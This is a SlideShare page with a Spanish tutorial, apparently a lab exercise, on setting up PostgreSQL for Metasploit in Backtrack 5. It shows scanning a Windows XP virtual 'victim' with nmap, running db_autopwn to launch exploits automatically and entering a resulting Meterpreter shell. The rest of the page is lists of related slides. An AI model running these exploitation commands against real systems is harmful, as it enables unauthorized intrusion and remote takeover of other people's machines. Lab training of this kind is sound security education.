SlideShare ist ein Scribd-Unternehmen logo

Db autopwn backtrack_5

Jeffry Roldan
Jeffry Roldan

Este documento proporciona instrucciones para configurar una base de datos PostgreSQL y realizar un autopwn en Backtrack 5 utilizando Nmap, Metasploit y la base de datos PostgreSQL recién configurada. Instruye al lector en instalar PostgreSQL, configurar una base de datos y usuario, escanear un objetivo con Nmap para identificar vulnerabilidades, y luego ejecutar un ataque autopwn utilizando la información de Nmap y la base de datos de Metasploit.

Bildung
1 von 5
Downloaden Sie, um offline zu lesen
ESTE TUTORIAL ES PARA FINES EDUCATIVIOS Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresql Aquí les dejo el post original de la info para que lo verifiquen: Metasploit db_autopwn using PostgreSQL El backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal: apt-get install postgresql libpq-dev el libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql. Al finalizar la instalación conectamos con el postgresql y cambiamos el password sudo su postgres -c psql
Aquí pones el password nuevo. ALTER USER postgres WITH PASSWORD 'password' ; después q sudo passwd -d postgres sudo su postgres -c passwd con este se cambia el password Esto es para conectarse del ruby al postgresql. gem install pg
Ahora llamamos a metasploit msfconsole db_driver postgresql y para conectar con la base de datos db_connect postgres:”password”@127.0.0.1/metasploitdb El password que habías puesto anterior mente. Aquí va el nombre que le quiera asignar a la base de datos. Ahora utilizamos nmap para ver las vulnerabilidades de la víctima. nmap -sV -O 10.0.0.71 <-------- el numero ip de la víctima que para el tutorial es una maquina virtual de xp sp 1.
Nmap escaneo los puertos e identifico el sistema operativo de la víctima. Ahora procedemos con el ataque. db_hosts db_autopwn -t -p -e AL terminar el autopwn muestra las posibles sesiones. Para entrar a una de ellas sessions -i 1 el numero es la sesión que fue elegida.
Aquí se puede ver como entra al shell de windows desde meterpreter. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS

Empfohlen

Backdoor via inyeccion
Backdoor via inyeccionBackdoor via inyeccion
Backdoor via inyeccion
q3rv0
 
Instalacion Angular 5 - 2018
Instalacion Angular 5 - 2018Instalacion Angular 5 - 2018
Instalacion Angular 5 - 2018
Pedro Delgado Aparicio
 
Escaneo de puertos clase 2 complemento d 28 02-13
Escaneo de puertos clase 2 complemento d 28 02-13Escaneo de puertos clase 2 complemento d 28 02-13
Escaneo de puertos clase 2 complemento d 28 02-13
Tensor
 
Proyecto 7
Proyecto 7Proyecto 7
Proyecto 7
ElisabetBlanco
 
Ruby EventMachine + em-WebSocket
Ruby EventMachine + em-WebSocketRuby EventMachine + em-WebSocket
Ruby EventMachine + em-WebSocket
Carlos Vasquez
 
Cómo diagnosticar problemas de rendimiento en entornos LAMP
Cómo diagnosticar problemas de rendimiento en entornos LAMPCómo diagnosticar problemas de rendimiento en entornos LAMP
Cómo diagnosticar problemas de rendimiento en entornos LAMP
Javier Carranza
 
Configuración y verificación de redes 1
Configuración y verificación de redes 1Configuración y verificación de redes 1
Configuración y verificación de redes 1
KELVIN MONTAÑEZ RODRIGUEZ
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
Efren Diaz Gomez
 

Empfohlen

Backdoor via inyeccion
Backdoor via inyeccionBackdoor via inyeccion
Backdoor via inyeccion
q3rv0
 
Instalacion Angular 5 - 2018
Instalacion Angular 5 - 2018Instalacion Angular 5 - 2018
Instalacion Angular 5 - 2018
Pedro Delgado Aparicio
 
Escaneo de puertos clase 2 complemento d 28 02-13
Escaneo de puertos clase 2 complemento d 28 02-13Escaneo de puertos clase 2 complemento d 28 02-13
Escaneo de puertos clase 2 complemento d 28 02-13
Tensor
 
Proyecto 7
Proyecto 7Proyecto 7
Proyecto 7
ElisabetBlanco
 
Ruby EventMachine + em-WebSocket
Ruby EventMachine + em-WebSocketRuby EventMachine + em-WebSocket
Ruby EventMachine + em-WebSocket
Carlos Vasquez
 
Cómo diagnosticar problemas de rendimiento en entornos LAMP
Cómo diagnosticar problemas de rendimiento en entornos LAMPCómo diagnosticar problemas de rendimiento en entornos LAMP
Cómo diagnosticar problemas de rendimiento en entornos LAMP
Javier Carranza
 
Configuración y verificación de redes 1
Configuración y verificación de redes 1Configuración y verificación de redes 1
Configuración y verificación de redes 1
KELVIN MONTAÑEZ RODRIGUEZ
 
Desde el DVR hasta la cocina
Desde el DVR hasta la cocinaDesde el DVR hasta la cocina
Desde el DVR hasta la cocina
Efren Diaz Gomez
 
Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
Tensor
 
Starta KaliLinux
Starta KaliLinuxStarta KaliLinux
Starta KaliLinux
Rafael Cornejo Martinez
 
Alumno
AlumnoAlumno
Alumno
Rafael Cornejo Martinez
 
Instalacion de java
Instalacion de java Instalacion de java
Instalacion de java
Geovanny Yungán
 
Subrutinas de retardo
Subrutinas de retardoSubrutinas de retardo
Subrutinas de retardo
Salvador Gonzalez
 
Tutorial okm roger
Tutorial okm rogerTutorial okm roger
Tutorial okm roger
rogervillen
 
Realizar un cron con centos 7
Realizar un cron con centos 7Realizar un cron con centos 7
Realizar un cron con centos 7
santiago Ramirez Ramirez
 
Servidor ftp en centos 7
Servidor ftp en centos 7Servidor ftp en centos 7
Servidor ftp en centos 7
santiago Ramirez Ramirez
 
Como hacer arp spoofing e
Como hacer arp spoofing eComo hacer arp spoofing e
Como hacer arp spoofing e
Tensor
 
Things i wish someone told me about node js
Things i wish someone told me about node jsThings i wish someone told me about node js
Things i wish someone told me about node js
Alexandre Ferrando
 
Hibernate - JPA @luce
Hibernate - JPA @luceHibernate - JPA @luce
Hibernate - JPA @luce
Javier Gamarra
 
PROGRAMACIÓN PARALELA
PROGRAMACIÓN PARALELAPROGRAMACIÓN PARALELA
PROGRAMACIÓN PARALELA
Raquel Solano
 
Practica7
Practica7Practica7
Practica7
Meztli Valeriano Orozco
 
Como utilizar rutinas_autolisp
Como utilizar rutinas_autolispComo utilizar rutinas_autolisp
Como utilizar rutinas_autolisp
JOHN NIEL FIGUEROA POZO
 
Instalacion Postgres
Instalacion PostgresInstalacion Postgres
Instalacion Postgres
ragmyl
 
Pic retardos por software
Pic retardos por softwarePic retardos por software
Pic retardos por software
Raul Marihuan Gonzalez
 
Escaneo de Puertos
Escaneo de PuertosEscaneo de Puertos
Escaneo de Puertos
arnoldvq16
 
Hilos
HilosHilos
Hilos
johanna20
 
Pentesting Basico
Pentesting BasicoPentesting Basico
Pentesting Basico
Cuauhtémoc García Somera
 
Fail2 ban
Fail2 banFail2 ban
Fail2 ban
yaneli14
 
Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2
Telefónica
 
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
xavazquez
 

Weitere ähnliche Inhalte

Was ist angesagt?

Como hacer arp spoofing e
Como hacer arp spoofing eComo hacer arp spoofing e
Como hacer arp spoofing e
Tensor
 
Instalacion Postgres
Instalacion PostgresInstalacion Postgres
Instalacion Postgres
ragmyl
 

Was ist angesagt? (20)

Ethical hacking 02
Ethical hacking 02Ethical hacking 02
Ethical hacking 02
 
Starta KaliLinux
Starta KaliLinuxStarta KaliLinux
Starta KaliLinux
 
Alumno
AlumnoAlumno
Alumno
 
Instalacion de java
Instalacion de java Instalacion de java
Instalacion de java
 
Subrutinas de retardo
Subrutinas de retardoSubrutinas de retardo
Subrutinas de retardo
 
Tutorial okm roger
Tutorial okm rogerTutorial okm roger
Tutorial okm roger
 
Realizar un cron con centos 7
Realizar un cron con centos 7Realizar un cron con centos 7
Realizar un cron con centos 7
 
Servidor ftp en centos 7
Servidor ftp en centos 7Servidor ftp en centos 7
Servidor ftp en centos 7
 
Como hacer arp spoofing e
Como hacer arp spoofing eComo hacer arp spoofing e
Como hacer arp spoofing e
 
Things i wish someone told me about node js
Things i wish someone told me about node jsThings i wish someone told me about node js
Things i wish someone told me about node js
 
Hibernate - JPA @luce
Hibernate - JPA @luceHibernate - JPA @luce
Hibernate - JPA @luce
 
PROGRAMACIÓN PARALELA
PROGRAMACIÓN PARALELAPROGRAMACIÓN PARALELA
PROGRAMACIÓN PARALELA
 
Practica7
Practica7Practica7
Practica7
 
Como utilizar rutinas_autolisp
Como utilizar rutinas_autolispComo utilizar rutinas_autolisp
Como utilizar rutinas_autolisp
 
Instalacion Postgres
Instalacion PostgresInstalacion Postgres
Instalacion Postgres
 
Pic retardos por software
Pic retardos por softwarePic retardos por software
Pic retardos por software
 
Escaneo de Puertos
Escaneo de PuertosEscaneo de Puertos
Escaneo de Puertos
 
Hilos
HilosHilos
Hilos
 
Pentesting Basico
Pentesting BasicoPentesting Basico
Pentesting Basico
 
Fail2 ban
Fail2 banFail2 ban
Fail2 ban
 

Ähnlich wie Db autopwn backtrack_5

Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
xavazquez
 
Replicacion con postgresql y slony
Replicacion con postgresql y slonyReplicacion con postgresql y slony
Replicacion con postgresql y slony
Johanna Mendez
 
Replicacion con postgresql y slony
Replicacion con postgresql y slonyReplicacion con postgresql y slony
Replicacion con postgresql y slony
Johanna Mendez
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
Francesc Perez
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
David Vevelas
 
Práctica 3 FTP
Práctica 3 FTPPráctica 3 FTP
Práctica 3 FTP
Terrafx9
 
Como monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagiosComo monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagios
Mcp Servicios
 
Configuración de un servidor dhcp en linux (debian 5)
Configuración de un servidor dhcp en linux (debian 5)Configuración de un servidor dhcp en linux (debian 5)
Configuración de un servidor dhcp en linux (debian 5)
admonfingerstyle
 

Ähnlich wie Db autopwn backtrack_5 (20)

Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2Cómo explotar EternalBlue en Windows Server 2012 R2
Cómo explotar EternalBlue en Windows Server 2012 R2
 
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmapVip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
Vip genial fantastico 23 pags imprimir clase 64498987-uso-de-la-herramienta-nmap
 
Instalación y configuración de sgbd presentacion
Instalación y configuración de sgbd presentacionInstalación y configuración de sgbd presentacion
Instalación y configuración de sgbd presentacion
 
Replicacion con postgresql y slony
Replicacion con postgresql y slonyReplicacion con postgresql y slony
Replicacion con postgresql y slony
 
Replicacion con postgresql y slony
Replicacion con postgresql y slonyReplicacion con postgresql y slony
Replicacion con postgresql y slony
 
Sql injection
Sql injectionSql injection
Sql injection
 
GOsa+samba+ldap
GOsa+samba+ldapGOsa+samba+ldap
GOsa+samba+ldap
 
Seguridad: Backtrack2
Seguridad: Backtrack2 Seguridad: Backtrack2
Seguridad: Backtrack2
 
Instalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntuInstalacion de Postrgre sql en ubuntu
Instalacion de Postrgre sql en ubuntu
 
Práctica 3 FTP
Práctica 3 FTPPráctica 3 FTP
Práctica 3 FTP
 
Como monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagiosComo monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagios
 
Como crear usuarios y asignar permisos en postgre sql blog de alevsk
Como crear usuarios y asignar permisos en postgre sql blog de alevskComo crear usuarios y asignar permisos en postgre sql blog de alevsk
Como crear usuarios y asignar permisos en postgre sql blog de alevsk
 
Como monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagiosComo monitorear asterisk utilizando nrpe de nagios
Como monitorear asterisk utilizando nrpe de nagios
 
Funcionamiento con my sql
Funcionamiento con my sqlFuncionamiento con my sql
Funcionamiento con my sql
 
Docker y PostgreSQL
Docker y PostgreSQLDocker y PostgreSQL
Docker y PostgreSQL
 
Tp1 db avanz-v1.1
Tp1 db avanz-v1.1Tp1 db avanz-v1.1
Tp1 db avanz-v1.1
 
Cassandra y php para desarrolladores sql
Cassandra y php para desarrolladores sqlCassandra y php para desarrolladores sql
Cassandra y php para desarrolladores sql
 
Configuración de un servidor dhcp en linux (debian 5)
Configuración de un servidor dhcp en linux (debian 5)Configuración de un servidor dhcp en linux (debian 5)
Configuración de un servidor dhcp en linux (debian 5)
 
Manual de instalación de mantis 1.2.11 en CentOS 5.8
Manual de instalación de mantis 1.2.11 en CentOS 5.8Manual de instalación de mantis 1.2.11 en CentOS 5.8
Manual de instalación de mantis 1.2.11 en CentOS 5.8
 
Documento
DocumentoDocumento
Documento
 

Kürzlich hochgeladen

🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
EliaHernndez7
 
Proyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdfProyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdf
patriciaines1993
 

Kürzlich hochgeladen (20)

PINTURA DEL RENACIMIENTO EN ESPAÑA (SIGLO XVI).ppt
PINTURA DEL RENACIMIENTO EN ESPAÑA (SIGLO XVI).pptPINTURA DEL RENACIMIENTO EN ESPAÑA (SIGLO XVI).ppt
PINTURA DEL RENACIMIENTO EN ESPAÑA (SIGLO XVI).ppt
 
Sesión de clase APC: Los dos testigos.pdf
Sesión de clase APC: Los dos testigos.pdfSesión de clase APC: Los dos testigos.pdf
Sesión de clase APC: Los dos testigos.pdf
 
activ4-bloque4 transversal doctorado.pdf
activ4-bloque4 transversal doctorado.pdfactiv4-bloque4 transversal doctorado.pdf
activ4-bloque4 transversal doctorado.pdf
 
Prueba de evaluación Geografía e Historia Comunidad de Madrid 4ºESO
Prueba de evaluación Geografía e Historia Comunidad de Madrid 4ºESOPrueba de evaluación Geografía e Historia Comunidad de Madrid 4ºESO
Prueba de evaluación Geografía e Historia Comunidad de Madrid 4ºESO
 
Feliz Día de la Madre - 5 de Mayo, 2024.pdf
Feliz Día de la Madre - 5 de Mayo, 2024.pdfFeliz Día de la Madre - 5 de Mayo, 2024.pdf
Feliz Día de la Madre - 5 de Mayo, 2024.pdf
 
Los dos testigos. Testifican de la Verdad
Los dos testigos. Testifican de la VerdadLos dos testigos. Testifican de la Verdad
Los dos testigos. Testifican de la Verdad
 
Tema 11. Dinámica de la hidrosfera 2024
Tema 11. Dinámica de la hidrosfera 2024Tema 11. Dinámica de la hidrosfera 2024
Tema 11. Dinámica de la hidrosfera 2024
 
1ro Programación Anual D.P.C.C planificación anual del área para el desarroll...
1ro Programación Anual D.P.C.C planificación anual del área para el desarroll...1ro Programación Anual D.P.C.C planificación anual del área para el desarroll...
1ro Programación Anual D.P.C.C planificación anual del área para el desarroll...
 
LA LITERATURA DEL BARROCO 2023-2024pptx.pptx
LA LITERATURA DEL BARROCO 2023-2024pptx.pptxLA LITERATURA DEL BARROCO 2023-2024pptx.pptx
LA LITERATURA DEL BARROCO 2023-2024pptx.pptx
 
Louis Jean François Lagrenée. Erotismo y sensualidad. El erotismo en la Hist...
Louis Jean François Lagrenée. Erotismo y sensualidad. El erotismo en la Hist...Louis Jean François Lagrenée. Erotismo y sensualidad. El erotismo en la Hist...
Louis Jean François Lagrenée. Erotismo y sensualidad. El erotismo en la Hist...
 
PP_Comunicacion en Salud: Objetivación de signos y síntomas
PP_Comunicacion en Salud: Objetivación de signos y síntomasPP_Comunicacion en Salud: Objetivación de signos y síntomas
PP_Comunicacion en Salud: Objetivación de signos y síntomas
 
Los avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtualesLos avatares para el juego dramático en entornos virtuales
Los avatares para el juego dramático en entornos virtuales
 
Supuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docxSupuestos_prácticos_funciones.docx
Supuestos_prácticos_funciones.docx
 
Linea del tiempo - Filosofos Cristianos.docx
Linea del tiempo - Filosofos Cristianos.docxLinea del tiempo - Filosofos Cristianos.docx
Linea del tiempo - Filosofos Cristianos.docx
 
La Sostenibilidad Corporativa. Administración Ambiental
La Sostenibilidad Corporativa. Administración AmbientalLa Sostenibilidad Corporativa. Administración Ambiental
La Sostenibilidad Corporativa. Administración Ambiental
 
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
🦄💫4° SEM32 WORD PLANEACIÓN PROYECTOS DARUKEL 23-24.docx
 
Biografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdfBiografía de Charles Coulomb física .pdf
Biografía de Charles Coulomb física .pdf
 
Power Point E. S.: Los dos testigos.pptx
Power Point E. S.: Los dos testigos.pptxPower Point E. S.: Los dos testigos.pptx
Power Point E. S.: Los dos testigos.pptx
 
Posición astronómica y geográfica de Europa.pptx
Posición astronómica y geográfica de Europa.pptxPosición astronómica y geográfica de Europa.pptx
Posición astronómica y geográfica de Europa.pptx
 
Proyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdfProyecto de aprendizaje dia de la madre MINT.pdf
Proyecto de aprendizaje dia de la madre MINT.pdf
 

Db autopwn backtrack_5

  • 1. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS Como hacer un autopwn en backtrack 5 con nmap, metasploit y postgresql Aquí les dejo el post original de la info para que lo verifiquen: Metasploit db_autopwn using PostgreSQL El backtrack 5 no trae instalado el postgresql por eso deve escribir en una terminal: apt-get install postgresql libpq-dev el libpq trabaja con las peticiones y respuestas entre cliente y servidor en el postgresql. Al finalizar la instalación conectamos con el postgresql y cambiamos el password sudo su postgres -c psql
  • 2. Aquí pones el password nuevo. ALTER USER postgres WITH PASSWORD 'password' ; después q sudo passwd -d postgres sudo su postgres -c passwd con este se cambia el password Esto es para conectarse del ruby al postgresql. gem install pg
  • 3. Ahora llamamos a metasploit msfconsole db_driver postgresql y para conectar con la base de datos db_connect postgres:”password”@127.0.0.1/metasploitdb El password que habías puesto anterior mente. Aquí va el nombre que le quiera asignar a la base de datos. Ahora utilizamos nmap para ver las vulnerabilidades de la víctima. nmap -sV -O 10.0.0.71 <-------- el numero ip de la víctima que para el tutorial es una maquina virtual de xp sp 1.
  • 4. Nmap escaneo los puertos e identifico el sistema operativo de la víctima. Ahora procedemos con el ataque. db_hosts db_autopwn -t -p -e AL terminar el autopwn muestra las posibles sesiones. Para entrar a una de ellas sessions -i 1 el numero es la sesión que fue elegida.
  • 5. Aquí se puede ver como entra al shell de windows desde meterpreter. ESTE TUTORIAL ES PARA FINES EDUCATIVIOS